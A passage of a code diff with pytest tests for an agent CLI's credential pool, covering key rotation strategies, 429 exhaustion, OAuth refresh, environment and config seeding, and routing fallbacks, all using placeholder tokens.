config_path.write_text("credential_pool_strategies:\n openrouter: round_robin\n")
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("openrouter")
|
||||
first = pool.select()
|
||||
assert first is not None
|
||||
assert first.id == "cred-1"
|
||||
|
||||
reloaded = load_pool("openrouter")
|
||||
second = reloaded.select()
|
||||
assert second is not None
|
||||
assert second.id == "cred-2"
|
||||
|
||||
|
||||
def test_random_strategy_uses_random_choice(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.delenv("OPENROUTER_API_KEY", raising=False)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"openrouter": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "primary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "***",
|
||||
},
|
||||
{
|
||||
"id": "cred-2",
|
||||
"label": "secondary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 1,
|
||||
"source": "manual",
|
||||
"access_token": "***",
|
||||
},
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
config_path = tmp_path / "hermes" / "config.yaml"
|
||||
config_path.write_text("credential_pool_strategies:\n openrouter: random\n")
|
||||
|
||||
monkeypatch.setattr("agent.credential_pool.random.choice", lambda entries: entries[-1])
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("openrouter")
|
||||
selected = pool.select()
|
||||
assert selected is not None
|
||||
assert selected.id == "cred-2"
|
||||
|
||||
|
||||
|
||||
def test_exhausted_entry_resets_after_ttl(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"openrouter": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "primary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-or-primary",
|
||||
"base_url": "https://openrouter.ai/api/v1",
|
||||
"last_status": "exhausted",
|
||||
"last_status_at": time.time() - 90000,
|
||||
"last_error_code": 429,
|
||||
}
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("openrouter")
|
||||
entry = pool.select()
|
||||
|
||||
assert entry is not None
|
||||
assert entry.id == "cred-1"
|
||||
assert entry.last_status == "ok"
|
||||
|
||||
|
||||
def test_mark_exhausted_and_rotate_persists_status(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"anthropic": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "primary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-ant-api-primary",
|
||||
},
|
||||
{
|
||||
"id": "cred-2",
|
||||
"label": "secondary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 1,
|
||||
"source": "manual",
|
||||
"access_token": "sk-ant-api-secondary",
|
||||
},
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("anthropic")
|
||||
assert pool.select().id == "cred-1"
|
||||
|
||||
next_entry = pool.mark_exhausted_and_rotate(status_code=402)
|
||||
|
||||
assert next_entry is not None
|
||||
assert next_entry.id == "cred-2"
|
||||
|
||||
auth_payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
persisted = auth_payload["credential_pool"]["anthropic"][0]
|
||||
assert persisted["last_status"] == "exhausted"
|
||||
assert persisted["last_error_code"] == 402
|
||||
|
||||
|
||||
def test_try_refresh_current_updates_only_current_entry(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"openai-codex": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "primary",
|
||||
"auth_type": "oauth",
|
||||
"priority": 0,
|
||||
"source": "device_code",
|
||||
"access_token": "access-old",
|
||||
"refresh_token": "refresh-old",
|
||||
"base_url": "https://chatgpt.com/backend-api/codex",
|
||||
},
|
||||
{
|
||||
"id": "cred-2",
|
||||
"label": "secondary",
|
||||
"auth_type": "oauth",
|
||||
"priority": 1,
|
||||
"source": "device_code",
|
||||
"access_token": "access-other",
|
||||
"refresh_token": "refresh-other",
|
||||
"base_url": "https://chatgpt.com/backend-api/codex",
|
||||
},
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.refresh_codex_oauth_pure",
|
||||
lambda access_token, refresh_token, timeout_seconds=20.0: {
|
||||
"access_token": "access-new",
|
||||
"refresh_token": "refresh-new",
|
||||
},
|
||||
)
|
||||
|
||||
pool = load_pool("openai-codex")
|
||||
current = pool.select()
|
||||
assert current.id == "cred-1"
|
||||
|
||||
refreshed = pool.try_refresh_current()
|
||||
|
||||
assert refreshed is not None
|
||||
assert refreshed.access_token == "access-new"
|
||||
|
||||
auth_payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
primary, secondary = auth_payload["credential_pool"]["openai-codex"]
|
||||
assert primary["access_token"] == "access-new"
|
||||
assert primary["refresh_token"] == "refresh-new"
|
||||
assert secondary["access_token"] == "access-other"
|
||||
assert secondary["refresh_token"] == "refresh-other"
|
||||
|
||||
|
||||
def test_load_pool_seeds_env_api_key(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "sk-or-seeded")
|
||||
_write_auth_store(tmp_path, {"version": 1, "providers": {}})
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("openrouter")
|
||||
entry = pool.select()
|
||||
|
||||
assert entry is not None
|
||||
assert entry.source == "env:OPENROUTER_API_KEY"
|
||||
assert entry.access_token == "sk-or-seeded"
|
||||
|
||||
|
||||
def test_load_pool_removes_stale_seeded_env_entry(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.delenv("OPENROUTER_API_KEY", raising=False)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"openrouter": [
|
||||
{
|
||||
"id": "seeded-env",
|
||||
"label": "OPENROUTER_API_KEY",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "env:OPENROUTER_API_KEY",
|
||||
"access_token": "stale-token",
|
||||
"base_url": "https://openrouter.ai/api/v1",
|
||||
}
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("openrouter")
|
||||
|
||||
assert pool.entries() == []
|
||||
|
||||
auth_payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
assert auth_payload["credential_pool"]["openrouter"] == []
|
||||
|
||||
|
||||
def test_load_pool_migrates_nous_provider_state(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"active_provider": "nous",
|
||||
"providers": {
|
||||
"nous": {
|
||||
"portal_base_url": "https://portal.example.com",
|
||||
"inference_base_url": "https://inference.example.com/v1",
|
||||
"client_id": "hermes-cli",
|
||||
"token_type": "Bearer",
|
||||
"scope": "inference:mint_agent_key",
|
||||
"access_token": "access-token",
|
||||
"refresh_token": "refresh-token",
|
||||
"expires_at": "2026-03-24T12:00:00+00:00",
|
||||
"agent_key": "agent-key",
|
||||
"agent_key_expires_at": "2026-03-24T13:30:00+00:00",
|
||||
}
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("nous")
|
||||
entry = pool.select()
|
||||
|
||||
assert entry is not None
|
||||
assert entry.source == "device_code"
|
||||
assert entry.portal_base_url == "https://portal.example.com"
|
||||
assert entry.agent_key == "agent-key"
|
||||
|
||||
|
||||
def test_load_pool_removes_stale_file_backed_singleton_entry(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
|
||||
monkeypatch.delenv("ANTHROPIC_TOKEN", raising=False)
|
||||
monkeypatch.delenv("CLAUDE_CODE_OAUTH_TOKEN", raising=False)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"anthropic": [
|
||||
{
|
||||
"id": "seeded-file",
|
||||
"label": "claude-code",
|
||||
"auth_type": "oauth",
|
||||
"priority": 0,
|
||||
"source": "claude_code",
|
||||
"access_token": "stale-access-token",
|
||||
"refresh_token": "stale-refresh-token",
|
||||
"expires_at_ms": int(time.time() * 1000) + 60_000,
|
||||
}
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_hermes_oauth_credentials",
|
||||
lambda: None,
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_claude_code_credentials",
|
||||
lambda: None,
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("anthropic")
|
||||
|
||||
assert pool.entries() == []
|
||||
|
||||
auth_payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
assert auth_payload["credential_pool"]["anthropic"] == []
|
||||
|
||||
|
||||
def test_load_pool_migrates_nous_provider_state_preserves_tls(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"active_provider": "nous",
|
||||
"providers": {
|
||||
"nous": {
|
||||
"portal_base_url": "https://portal.example.com",
|
||||
"inference_base_url": "https://inference.example.com/v1",
|
||||
"client_id": "hermes-cli",
|
||||
"token_type": "Bearer",
|
||||
"scope": "inference:mint_agent_key",
|
||||
"access_token": "access-token",
|
||||
"refresh_token": "refresh-token",
|
||||
"expires_at": "2026-03-24T12:00:00+00:00",
|
||||
"agent_key": "agent-key",
|
||||
"agent_key_expires_at": "2026-03-24T13:30:00+00:00",
|
||||
"tls": {
|
||||
"insecure": True,
|
||||
"ca_bundle": "/tmp/nous-ca.pem",
|
||||
},
|
||||
}
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("nous")
|
||||
entry = pool.select()
|
||||
|
||||
assert entry is not None
|
||||
assert entry.tls == {
|
||||
"insecure": True,
|
||||
"ca_bundle": "/tmp/nous-ca.pem",
|
||||
}
|
||||
|
||||
auth_payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
assert auth_payload["credential_pool"]["nous"][0]["tls"] == {
|
||||
"insecure": True,
|
||||
"ca_bundle": "/tmp/nous-ca.pem",
|
||||
}
|
||||
|
||||
|
||||
def test_singleton_seed_does_not_clobber_manual_oauth_entry(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
|
||||
monkeypatch.delenv("ANTHROPIC_TOKEN", raising=False)
|
||||
monkeypatch.delenv("CLAUDE_CODE_OAUTH_TOKEN", raising=False)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"anthropic": [
|
||||
{
|
||||
"id": "manual-1",
|
||||
"label": "manual-pkce",
|
||||
"auth_type": "oauth",
|
||||
"priority": 0,
|
||||
"source": "manual:hermes_pkce",
|
||||
"access_token": "manual-token",
|
||||
"refresh_token": "manual-refresh",
|
||||
"expires_at_ms": 1711234567000,
|
||||
}
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_hermes_oauth_credentials",
|
||||
lambda: {
|
||||
"accessToken": "seeded-token",
|
||||
"refreshToken": "seeded-refresh",
|
||||
"expiresAt": 1711234999000,
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_claude_code_credentials",
|
||||
lambda: None,
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("anthropic")
|
||||
entries = pool.entries()
|
||||
|
||||
assert len(entries) == 2
|
||||
assert {entry.source for entry in entries} == {"manual:hermes_pkce", "hermes_pkce"}
|
||||
|
||||
|
||||
def test_load_pool_prefers_anthropic_env_token_over_file_backed_oauth(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
|
||||
monkeypatch.setenv("ANTHROPIC_TOKEN", "env-override-token")
|
||||
monkeypatch.delenv("CLAUDE_CODE_OAUTH_TOKEN", raising=False)
|
||||
_write_auth_store(tmp_path, {"version": 1, "providers": {}})
|
||||
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_hermes_oauth_credentials",
|
||||
lambda: {
|
||||
"accessToken": "file-backed-token",
|
||||
"refreshToken": "refresh-token",
|
||||
"expiresAt": int(time.time() * 1000) + 3_600_000,
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_claude_code_credentials",
|
||||
lambda: None,
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("anthropic")
|
||||
entry = pool.select()
|
||||
|
||||
assert entry is not None
|
||||
assert entry.source == "env:ANTHROPIC_TOKEN"
|
||||
assert entry.access_token == "env-override-token"
|
||||
|
||||
|
||||
def test_least_used_strategy_selects_lowest_count(tmp_path, monkeypatch):
|
||||
"""least_used strategy should select the credential with the lowest request_count."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool.get_pool_strategy",
|
||||
lambda _provider: "least_used",
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool._seed_from_singletons",
|
||||
lambda provider, entries: (False, set()),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool._seed_from_env",
|
||||
lambda provider, entries: (False, set()),
|
||||
)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"openrouter": [
|
||||
{
|
||||
"id": "key-a",
|
||||
"label": "heavy",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-or-heavy",
|
||||
"request_count": 100,
|
||||
},
|
||||
{
|
||||
"id": "key-b",
|
||||
"label": "light",
|
||||
"auth_type": "api_key",
|
||||
"priority": 1,
|
||||
"source": "manual",
|
||||
"access_token": "sk-or-light",
|
||||
"request_count": 10,
|
||||
},
|
||||
{
|
||||
"id": "key-c",
|
||||
"label": "medium",
|
||||
"auth_type": "api_key",
|
||||
"priority": 2,
|
||||
"source": "manual",
|
||||
"access_token": "sk-or-medium",
|
||||
"request_count": 50,
|
||||
},
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("openrouter")
|
||||
entry = pool.select()
|
||||
assert entry is not None
|
||||
assert entry.id == "key-b"
|
||||
assert entry.access_token == "sk-or-light"
|
||||
|
||||
|
||||
def test_mark_used_increments_request_count(tmp_path, monkeypatch):
|
||||
"""mark_used should increment the request_count of the current entry."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool.get_pool_strategy",
|
||||
lambda _provider: "fill_first",
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool._seed_from_singletons",
|
||||
lambda provider, entries: (False, set()),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool._seed_from_env",
|
||||
lambda provider, entries: (False, set()),
|
||||
)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"openrouter": [
|
||||
{
|
||||
"id": "key-a",
|
||||
"label": "test",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-or-test",
|
||||
"request_count": 5,
|
||||
},
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("openrouter")
|
||||
entry = pool.select()
|
||||
assert entry is not None
|
||||
assert entry.request_count == 5
|
||||
pool.mark_used()
|
||||
updated = pool.current()
|
||||
assert updated is not None
|
||||
assert updated.request_count == 6
|
||||
|
||||
|
||||
def test_thread_safety_concurrent_select(tmp_path, monkeypatch):
|
||||
"""Concurrent select() calls should not corrupt pool state."""
|
||||
import threading as _threading
|
||||
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool.get_pool_strategy",
|
||||
lambda _provider: "round_robin",
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool._seed_from_singletons",
|
||||
lambda provider, entries: (False, set()),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool._seed_from_env",
|
||||
lambda provider, entries: (False, set()),
|
||||
)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"openrouter": [
|
||||
{
|
||||
"id": f"key-{i}",
|
||||
"label": f"key-{i}",
|
||||
"auth_type": "api_key",
|
||||
"priority": i,
|
||||
"source": "manual",
|
||||
"access_token": f"sk-or-{i}",
|
||||
}
|
||||
for i in range(5)
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("openrouter")
|
||||
results = []
|
||||
errors = []
|
||||
|
||||
def worker():
|
||||
try:
|
||||
for _ in range(20):
|
||||
entry = pool.select()
|
||||
if entry:
|
||||
results.append(entry.id)
|
||||
pool.mark_used(entry.id)
|
||||
except Exception as exc:
|
||||
errors.append(exc)
|
||||
|
||||
threads = [_threading.Thread(target=worker) for _ in range(4)]
|
||||
for t in threads:
|
||||
t.start()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
assert not errors, f"Thread errors: {errors}"
|
||||
assert len(results) == 80 # 4 threads * 20 selects
|
||||
|
||||
|
||||
def test_custom_endpoint_pool_keyed_by_name(tmp_path, monkeypatch):
|
||||
"""Verify load_pool('custom:together.ai') works and returns entries from auth.json."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
# Disable seeding so we only test stored entries
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool._seed_custom_pool",
|
||||
lambda pool_key, entries: (False, set()),
|
||||
)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"custom:together.ai": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "together-key",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-together-xxx",
|
||||
"base_url": "https://api.together.ai/v1",
|
||||
},
|
||||
{
|
||||
"id": "cred-2",
|
||||
"label": "together-key-2",
|
||||
"auth_type": "api_key",
|
||||
"priority": 1,
|
||||
"source": "manual",
|
||||
"access_token": "sk-together-yyy",
|
||||
"base_url": "https://api.together.ai/v1",
|
||||
},
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("custom:together.ai")
|
||||
assert pool.has_credentials()
|
||||
entries = pool.entries()
|
||||
assert len(entries) == 2
|
||||
assert entries[0].access_token == "sk-together-xxx"
|
||||
assert entries[1].access_token == "sk-together-yyy"
|
||||
|
||||
# Select should return the first entry (fill_first default)
|
||||
entry = pool.select()
|
||||
assert entry is not None
|
||||
assert entry.id == "cred-1"
|
||||
|
||||
|
||||
def test_custom_endpoint_pool_seeds_from_config(tmp_path, monkeypatch):
|
||||
"""Verify seeding from custom_providers api_key in config.yaml."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(tmp_path, {"version": 1})
|
||||
|
||||
# Write config.yaml with a custom_providers entry
|
||||
config_path = tmp_path / "hermes" / "config.yaml"
|
||||
import yaml
|
||||
config_path.write_text(yaml.dump({
|
||||
"custom_providers": [
|
||||
{
|
||||
"name": "Together.ai",
|
||||
"base_url": "https://api.together.ai/v1",
|
||||
"api_key": "sk-config-seeded",
|
||||
}
|
||||
]
|
||||
}))
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("custom:together.ai")
|
||||
assert pool.has_credentials()
|
||||
entries = pool.entries()
|
||||
assert len(entries) == 1
|
||||
assert entries[0].access_token == "sk-config-seeded"
|
||||
assert entries[0].source == "config:Together.ai"
|
||||
|
||||
|
||||
def test_custom_endpoint_pool_seeds_from_model_config(tmp_path, monkeypatch):
|
||||
"""Verify seeding from model.api_key when model.provider=='custom' and base_url matches."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(tmp_path, {"version": 1})
|
||||
|
||||
import yaml
|
||||
config_path = tmp_path / "hermes" / "config.yaml"
|
||||
config_path.write_text(yaml.dump({
|
||||
"custom_providers": [
|
||||
{
|
||||
"name": "Together.ai",
|
||||
"base_url": "https://api.together.ai/v1",
|
||||
}
|
||||
],
|
||||
"model": {
|
||||
"provider": "custom",
|
||||
"base_url": "https://api.together.ai/v1",
|
||||
"api_key": "sk-model-key",
|
||||
},
|
||||
}))
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("custom:together.ai")
|
||||
assert pool.has_credentials()
|
||||
entries = pool.entries()
|
||||
# Should have the model_config entry
|
||||
model_entries = [e for e in entries if e.source == "model_config"]
|
||||
assert len(model_entries) == 1
|
||||
assert model_entries[0].access_token == "sk-model-key"
|
||||
|
||||
|
||||
def test_custom_pool_does_not_break_existing_providers(tmp_path, monkeypatch):
|
||||
"""Existing registry providers work exactly as before with custom pool support."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "sk-or-test")
|
||||
_write_auth_store(tmp_path, {"version": 1, "providers": {}})
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("openrouter")
|
||||
entry = pool.select()
|
||||
assert entry is not None
|
||||
assert entry.source == "env:OPENROUTER_API_KEY"
|
||||
assert entry.access_token == "sk-or-test"
|
||||
|
||||
|
||||
def test_get_custom_provider_pool_key(tmp_path, monkeypatch):
|
||||
"""get_custom_provider_pool_key maps base_url to custom:<name> pool key."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
(tmp_path / "hermes").mkdir(parents=True, exist_ok=True)
|
||||
import yaml
|
||||
config_path = tmp_path / "hermes" / "config.yaml"
|
||||
config_path.write_text(yaml.dump({
|
||||
"custom_providers": [
|
||||
{
|
||||
"name": "Together.ai",
|
||||
"base_url": "https://api.together.ai/v1",
|
||||
"api_key": "sk-xxx",
|
||||
},
|
||||
{
|
||||
"name": "My Local Server",
|
||||
"base_url": "http://localhost:8080/v1",
|
||||
},
|
||||
]
|
||||
}))
|
||||
|
||||
from agent.credential_pool import get_custom_provider_pool_key
|
||||
|
||||
assert get_custom_provider_pool_key("https://api.together.ai/v1") == "custom:together.ai"
|
||||
assert get_custom_provider_pool_key("https://api.together.ai/v1/") == "custom:together.ai"
|
||||
assert get_custom_provider_pool_key("http://localhost:8080/v1") == "custom:my-local-server"
|
||||
assert get_custom_provider_pool_key("https://unknown.example.com/v1") is None
|
||||
assert get_custom_provider_pool_key("") is None
|
||||
|
||||
|
||||
def test_list_custom_pool_providers(tmp_path, monkeypatch):
|
||||
"""list_custom_pool_providers returns custom: pool keys from auth.json."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"anthropic": [
|
||||
{
|
||||
"id": "a1",
|
||||
"label": "test",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-ant-xxx",
|
||||
}
|
||||
],
|
||||
"custom:together.ai": [
|
||||
{
|
||||
"id": "c1",
|
||||
"label": "together",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-tog-xxx",
|
||||
}
|
||||
],
|
||||
"custom:fireworks": [
|
||||
{
|
||||
"id": "c2",
|
||||
"label": "fireworks",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-fw-xxx",
|
||||
}
|
||||
],
|
||||
"custom:empty": [],
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import list_custom_pool_providers
|
||||
|
||||
result = list_custom_pool_providers()
|
||||
assert result == ["custom:fireworks", "custom:together.ai"]
|
||||
# "custom:empty" not included because it's empty
|
||||
350
tests/test_credential_pool_routing.py
Normal file
350
tests/test_credential_pool_routing.py
Normal file
|
|
@ -0,0 +1,350 @@
|
|||
"""Tests for credential pool preservation through smart routing and 429 recovery.
|
||||
|
||||
Covers:
|
||||
1. credential_pool flows through resolve_turn_route (no-route and fallback paths)
|
||||
2. CLI _resolve_turn_agent_config passes credential_pool to primary dict
|
||||
3. Gateway _resolve_turn_agent_config passes credential_pool to primary dict
|
||||
4. Eager fallback deferred when credential pool has credentials
|
||||
5. Eager fallback fires when no credential pool exists
|
||||
6. Full 429 rotation cycle: retry-same → rotate → exhaust → fallback
|
||||
"""
|
||||
|
||||
import os
|
||||
import time
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import MagicMock, patch, PropertyMock
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# 1. smart_model_routing: credential_pool preserved in no-route path
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSmartRoutingPoolPreservation:
|
||||
def test_no_route_preserves_credential_pool(self):
|
||||
from agent.smart_model_routing import resolve_turn_route
|
||||
|
||||
fake_pool = MagicMock(name="CredentialPool")
|
||||
primary = {
|
||||
"model": "gpt-5.4",
|
||||
"api_key": "sk-test",
|
||||
"base_url": None,
|
||||
"provider": "openai-codex",
|
||||
"api_mode": "codex_responses",
|
||||
"command": None,
|
||||
"args": [],
|
||||
"credential_pool": fake_pool,
|
||||
}
|
||||
# routing disabled
|
||||
result = resolve_turn_route("hello", None, primary)
|
||||
assert result["runtime"]["credential_pool"] is fake_pool
|
||||
|
||||
def test_no_route_none_pool(self):
|
||||
from agent.smart_model_routing import resolve_turn_route
|
||||
|
||||
primary = {
|
||||
"model": "gpt-5.4",
|
||||
"api_key": "sk-test",
|
||||
"base_url": None,
|
||||
"provider": "openai-codex",
|
||||
"api_mode": "codex_responses",
|
||||
"command": None,
|
||||
"args": [],
|
||||
}
|
||||
result = resolve_turn_route("hello", None, primary)
|
||||
assert result["runtime"]["credential_pool"] is None
|
||||
|
||||
def test_routing_disabled_preserves_pool(self):
|
||||
from agent.smart_model_routing import resolve_turn_route
|
||||
|
||||
fake_pool = MagicMock(name="CredentialPool")
|
||||
primary = {
|
||||
"model": "gpt-5.4",
|
||||
"api_key": "sk-test",
|
||||
"base_url": None,
|
||||
"provider": "openai-codex",
|
||||
"api_mode": "codex_responses",
|
||||
"command": None,
|
||||
"args": [],
|
||||
"credential_pool": fake_pool,
|
||||
}
|
||||
# routing explicitly disabled
|
||||
result = resolve_turn_route("hello", {"enabled": False}, primary)
|
||||
assert result["runtime"]["credential_pool"] is fake_pool
|
||||
|
||||
def test_route_fallback_on_resolve_error_preserves_pool(self, monkeypatch):
|
||||
"""When smart routing picks a cheap model but resolve_runtime_provider
|
||||
fails, the fallback to primary must still include credential_pool."""
|
||||
from agent.smart_model_routing import resolve_turn_route
|
||||
|
||||
fake_pool = MagicMock(name="CredentialPool")
|
||||
primary = {
|
||||
"model": "gpt-5.4",
|
||||
"api_key": "sk-test",
|
||||
"base_url": None,
|
||||
"provider": "openai-codex",
|
||||
"api_mode": "codex_responses",
|
||||
"command": None,
|
||||
"args": [],
|
||||
"credential_pool": fake_pool,
|
||||
}
|
||||
routing_config = {
|
||||
"enabled": True,
|
||||
"cheap_model": "openai/gpt-4.1-mini",
|
||||
"cheap_provider": "openrouter",
|
||||
"max_tokens": 200,
|
||||
